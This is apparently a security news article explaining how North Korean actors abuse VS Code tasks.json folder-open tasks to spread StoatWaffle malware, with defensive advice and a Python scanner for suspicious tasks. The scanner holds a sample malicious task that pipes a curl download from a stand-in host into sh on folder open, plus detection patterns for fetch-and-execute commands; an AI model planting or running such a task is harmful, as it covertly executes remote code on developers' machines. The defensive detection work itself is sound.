North Korean Hackers Use VS Code Tasks to Spread StoatWaffle Malware


North Korean hackers are distributing StoatWaffle malware through malicious VS Code projects, abusing the tasks.json automation feature in attacks that began in December 2025.

Let's talk about something that's been keeping security folks up at night lately. North Korean hackers have found a new way to sneak malware onto developers' machines, and it's surprisingly simple. They're using something most coders work with every day: Visual Studio Code. You know that feeling when you're deep in a project and just want things to run smoothly? These threat actors are counting on that.

They've been distributing what's called StoatWaffle malware through malicious VS Code projects. It's part of what security researchers call the Contagious Interview campaign, though you might also hear it referred to as WaterPlum.

### How the Attack Works

Here's where it gets clever. Instead of relying on flashy exploits or unpatched vulnerabilities, they're using VS Code's built-in automation. Specifically, they abuse the `tasks.json` file (kept in a project's `.vscode` folder) that developers use to automate routine jobs like building a project or running tests.

Think about it like this: you download what looks like a legitimate project, maybe from a forum or GitHub. You open it in VS Code, and everything seems normal. But hidden in that `tasks.json` is a task marked to run when the folder is opened (the `"runOptions": {"runOn": "folderOpen"}` setting). VS Code only fires such tasks in a workspace you have marked as trusted, so the attack leans on the victim clicking through the Workspace Trust prompt. Once that happens, the task's shell command runs under your user account, and the malware installs itself before you have typed a line of code.

### Why This Tactic Is So Effective

This approach works because it targets developers' trust in their tools. VS Code is used by millions of programmers worldwide, from beginners to experts at major tech companies. We all assume our development environments are safe spaces to work in.

- Developers rarely think to check automation files for malicious code
- The attacks blend in with legitimate development workflows
- Security tools might not flag tasks.json as suspicious
- The task runs with the same permissions as VS Code itself, which means your user account, and with it your source code, SSH keys and any cloud credentials stored on the machine

It's a classic case of hiding in plain sight. The attackers aren't breaking down doors - they're walking right through the front entrance because we've left it unlocked.
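To make the mechanism concrete, here is a small scanner added to this article as an example. It is not code from the article, the researchers it cites, or the campaign. It parses a `.vscode/tasks.json` (VS Code's JSON-with-comments flavour) and flags any task set to run on folder open, any task that hides its terminal, and any command that fetches and executes remote content. The two embedded `tasks.json` samples are constructed for illustration; the `cdn.example.invalid` host and the command heuristics are this example's own assumptions, not StoatWaffle indicators.

```python
"""Flag VS Code tasks that run automatically on folder open.

Added example for this article; not code from the article or from the
researchers it cites. It assumes the tasks.json schema VS Code documents:
a top-level "tasks" array whose entries may carry
"runOptions": {"runOn": "folderOpen"}, optional "windows"/"linux"/"osx"
overrides, and "presentation": {"reveal": "never"}. The command heuristics
are the example author's own and are not StoatWaffle indicators.
"""
import json
import re
from pathlib import Path

# tasks.json is JSON-with-comments; remove // and /* */ comments that sit
# outside string literals, plus the trailing commas VS Code tolerates.
_JSONC_RE = re.compile(r'("(?:\\.|[^"\\])*")|//[^\n]*|/\*.*?\*/', re.DOTALL)

def strip_jsonc(text: str) -> str:
    text = _JSONC_RE.sub(lambda m: m.group(1) or "", text)
    return re.sub(r',(\s*[}\]])', r'\1', text)  # naive: also hits ",}" inside strings

# Heuristics (illustrative, not campaign IoCs): things a build task rarely needs.
SUSPICIOUS = [
    (re.compile(r'\b(curl|wget|Invoke-WebRequest|iwr)\b', re.I),
     "downloads from the network"),
    (re.compile(r'\|\s*(sh|bash|zsh|python3?|node|powershell|pwsh|iex)\b', re.I),
     "pipes fetched content into an interpreter"),
    (re.compile(r'base64\s+(-d|--decode)|FromBase64String', re.I),
     "decodes a base64 payload"),
]

def _commands(task: dict) -> str:
    """Join command + args for the task and its per-OS overrides into one string."""
    pieces = []
    for scope in (task, *(task.get(k, {}) for k in ("windows", "linux", "osx"))):
        cmd = scope.get("command", "")
        args = scope.get("args", [])
        pieces.append(cmd if isinstance(cmd, str) else "")
        # args may be plain strings or {"value": ..., "quoting": ...} objects
        pieces += [a if isinstance(a, str) else str(a.get("value", "")) for a in args]
    return " ".join(p for p in pieces if p)

def scan_tasks(jsonc_text: str) -> list[dict]:
    """Return one finding per task that auto-runs or matches a heuristic."""
    data = json.loads(strip_jsonc(jsonc_text))
    findings = []
    for task in data.get("tasks", []):
        reasons = []
        if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
            reasons.append("runs automatically when the folder is opened")
        if (task.get("presentation") or {}).get("reveal") == "never":
            reasons.append("hides its terminal output")
        cmd = _commands(task)
        reasons += [why for pat, why in SUSPICIOUS if pat.search(cmd)]
        if reasons:
            findings.append({"label": task.get("label", "<unnamed>"),
                             "command": cmd, "reasons": reasons})
    return findings

def scan_tree(root: str) -> dict[str, list[dict]]:
    """Scan every .vscode/tasks.json under root, e.g. a freshly cloned repo."""
    return {str(p): scan_tasks(p.read_text(encoding="utf-8"))
            for p in Path(root).glob("**/.vscode/tasks.json")}

# Constructed samples (not real campaign artefacts; the host is a reserved
# .invalid name). The first mimics the pattern the article describes.
MALICIOUS_TASKS = r'''{
  // Looks like routine project setup
  "version": "2.0.0",
  "tasks": [
    {
      "label": "Install dependencies",
      "type": "shell",
      "command": "curl -fsSL https://cdn.example.invalid/setup.sh | sh",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" },
    }
  ]
}'''

BENIGN_TASKS = '''{
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build",
      "group": { "kind": "build", "isDefault": true } }
  ]
}'''

if __name__ == "__main__":
    for name, text in (("malicious", MALICIOUS_TASKS), ("benign", BENIGN_TASKS)):
        print(name, scan_tasks(text))
```

Run `scan_tree(".")` against a clone before you click "Trust" in the Workspace Trust dialog; an empty result is not proof of safety (the heuristics are deliberately narrow), but any `folderOpen` task in a repository you did not write deserves a hard look before the folder is trusted.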
### The Timeline of These Attacks

What's particularly concerning is how recent this tactic is. Security analysts first spotted these attacks in December 2025, so this is a fresh approach that's still evolving. The North Korean group behind it is known for being adaptable and persistent. As one security researcher put it recently: "When attackers start targeting development tools, we're in new territory. This isn't just about compromising systems - it's about compromising the very process of creating software."

### What StoatWaffle Malware Does

While we're still learning about StoatWaffle's full capabilities, here's what security experts have uncovered so far:

- It establishes persistence on infected systems
- It can steal sensitive data and credentials
- The malware communicates with command-and-control servers
- It has capabilities for lateral movement within networks

The real danger isn't just the initial infection. Once StoatWaffle gets a foothold, it can spread to other systems, potentially compromising entire development pipelines or corporate networks.

### Protecting Yourself and Your Team

So what can you do about this? First, don't panic. Awareness is your best defense. Be more cautious about the projects you download and open. If something seems off about a project's structure or source, trust that instinct.

Here are some practical steps you can take right now:

- Leave Workspace Trust enabled and open unfamiliar repositories in Restricted Mode, where VS Code does not run tasks at all; if you never rely on folder-open tasks, also set `task.allowAutomaticTasks` to `off` in your user settings
- Before trusting a workspace, read `.vscode/tasks.json` (along with `settings.json` and `launch.json`) in a plain editor or on the hosting site, and treat any task with `"runOn": "folderOpen"` as a red flag
- Only download projects from trusted sources you can verify
- Keep VS Code and all extensions updated to the latest versions
- Open unknown projects in a throwaway VM or container rather than on your main workstation
- Implement network segmentation to limit potential damage

Remember, security isn't about being paranoid - it's about being prepared. These attacks succeed because they exploit normal workflows.
By understanding how they work, you can build habits that keep you safe without slowing down your development process. The landscape of cyber threats keeps changing, and developers are increasingly in the crosshairs. Tools like VS Code make us more productive, but they also create new attack surfaces. Staying informed about these tactics is the first step toward building more secure development practices. Take a moment today to check your own setup. Look at those tasks.json files with fresh eyes. Talk to your team about these threats. Because in security, the best defense is a community that watches out for each other.